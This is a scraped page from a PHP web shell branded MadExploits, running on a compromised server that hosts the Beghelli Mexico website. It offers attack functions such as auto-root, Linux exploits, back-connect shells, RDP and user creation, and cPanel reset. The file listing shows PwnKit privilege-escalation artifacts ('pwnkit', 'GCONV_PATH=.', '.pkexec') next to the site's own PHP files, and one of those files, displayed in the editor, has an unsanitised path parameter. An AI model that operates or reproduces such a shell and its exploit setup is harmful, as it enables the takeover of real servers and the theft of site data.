Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cms
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
.htaccess
385
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.html
2.91
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
authorized-agents.php
26.61
KB
-rw-r--r--
beghelli-group.php
31.82
KB
-rw-r--r--
certifications.php
28.79
KB
-rw-r--r--
downloads.php
26.53
KB
-rw-r--r--
fotometrias.php
5.12
KB
-rw-r--r--
index.php
42.95
KB
-rw-r--r--
info-rq.php
29.12
KB
-rw-r--r--
investor-relations.php
27.09
KB
-rw-r--r--
partnerships.php
28.16
KB
-rw-r--r--
privacy-notice.php
49.14
KB
-rw-r--r--
product-detail.php
28.31
KB
-rw-r--r--
product-literature.php
26.79
KB
-rw-r--r--
products-area.html
30.87
KB
-rw-r--r--
products-area.php
29.9
KB
-rw-r--r--
products-category.php
35.76
KB
-rw-r--r--
products-search.php
31.32
KB
-rw-r--r--
provider.php
34.14
KB
-rw-r--r--
providers-login.php
2.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
representant-login.php
2.61
KB
-rw-r--r--
representant.php
68.88
KB
-rw-r--r--
robots.txt
149
B
-rw-r--r--
sitemap.xml
79.16
KB
-rw-r--r--
success-cases.php
52.94
KB
-rw-r--r--
support.php
40.39
KB
-rw-r--r--
thank-you.php
23.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fotometrias.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Site Reference --> <meta name="description" content="Grupo Beghelli es una empresa italiana experta en productos de iluminación, sistemas de control, fotovoltaicos y emergencia, entre otras áreas. Su catálogo incluye una amplia variedad de productos, todos con calidad, diseño y tecnología de una empresa de clase mundial."/> <meta name="keywords" content="beghelli, iluminación industrial, emergencia, sistemas de control"/> <meta name="author" content="Gustavo Bernal Cervantes"/> <meta name="theme-color" content="#012D3E"/> <link rel="canonical" href="https://beghelli.com.mx/"/> <title>Beghelli | Iluminación Industrial, Emergencia y Sistemas de Control</title> <!-- Favicon Tags --> <link rel="apple-touch-icon" sizes="180x180" href="assets/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="assets/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="assets/favicon/favicon-16x16.png"> <link rel="manifest" href="assets/favicon/site.webmanifest"> <!-- OG Meta Tags --> <meta property="og:title" content="Beghelli | Iluminación Industrial, Emergencia y Sistemas de Control"/> <meta property="og:url" content="https://beghelli.com.mx/"/> <meta property="og:image" content="assets/img/og.png"/> <meta property="og:type" content="website"/> <meta property="og:description" content="Grupo Beghelli es una empresa italiana experta en productos de iluminación, sistemas de control, fotovoltaicos y emergencia, entre otras áreas. Su catálogo incluye una amplia variedad de productos, todos con calidad, diseño y tecnología de una empresa de clase mundial."/> <meta property="og:locale" content="es_MX"/> <!-- Resources --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.css"/> <link href="https://fonts.cdnfonts.com/css/sofia-pro" rel="stylesheet"> <link rel="stylesheet" href="css/normalize.css"> <link rel="stylesheet" href="css/style.css"> <script src="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.js"></script> <script src="https://kit.fontawesome.com/785530d049.js" crossorigin="anonymous"></script> <!-- Files Handling --> <?php // Get directory route $subdirectory = ""; if(isset($_GET['subdirectory'])) { $subdirectory = $_GET['subdirectory']; } $directory = "assets/files/downloads/fotometrias"; $directory = !empty($subdirectory) ? "$directory/$subdirectory" : $directory; // Check if directory exists if(!is_dir($directory)) { die("No existe la carpeta"); } // Get and filter filelist $files = scandir($directory); $files = array_diff($files, ['.', '..']); ?> </head> <body> <section class="photometry full"> <div> <div class="photo__header"> <button onclick="history.back()"> <i class="fa-regular fa-arrow-left"></i> </button> <h1> <?php echo isset($subdirectory) ? "fotometrias/$subdirectory" : "Fotometrías del catálogo completo"; ?> </h1> </div> <div class="photo__links"> <?php foreach ($files as $file) { $icon; // Is File if(str_contains($file, ".")) { if(str_contains($file, ".zip")): $icon = '<i class="fa-regular fa-file-zipper"></i>'; elseif(str_contains($file, ".png")): $icon = '<i class="fa-regular fa-image-polaroid"></i>'; else: $icon = '<i class="fa-regular fa-file"></i>'; endif; echo $icon . "\n<a href='$directory/$file' download>$file</a>"; } // Is Folder else { $parameter = !empty($subdirectory) ? "$subdirectory%2F$file" : $file; $icon = '<i class="fa-solid fa-folder"></i>'; echo $icon . "\n<a href='?subdirectory=$parameter'>$file</a>"; } } ?> </div> </div> </section> </body> </html>
Close